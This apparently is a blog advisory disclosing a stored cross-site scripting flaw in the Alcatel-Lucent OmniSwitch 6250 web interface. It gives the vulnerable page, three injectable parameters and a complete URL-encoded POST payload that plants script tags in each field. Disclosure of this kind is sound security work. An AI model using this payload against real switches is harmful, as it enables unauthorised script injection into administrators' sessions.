Alcatel-Lucent OmniSwitch 6250 Switch sys_filesystem_info_si.html Multiple Parameter Stored XSS

The Alcatel-Lucent OmniSwitch 6250 Switch has a cross-site scripting (XSS) vulnerability in the /sys/content/sys_filesystem_info_si.html page (CVE-2016-78002). An authenticated user with permission to update the fields can inject arbitrary JavaScript into three fields that will be stored and displayed on /phys/content/phys_chs_info_stable.html when viewed. The fields/parameters are Contact (EmWeb_ns:mip:208.T1:O1 parameter), Name (EmWeb_ns:mip:209.T1:O2 parameter), Location (EmWeb_ns:mip:210.T1:O3 parameter) which are updated by a POST request.

The payload looks like:

EmWeb_ns%3Amip%3A208.T1%3AO1=Alcatel-Lucent+%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-location%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A209.T1%3AO2=vxTarget%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-name%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A210.T1%3AO3=vxTarget%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-location%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A211=Apply

Advertisements

Tags: ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: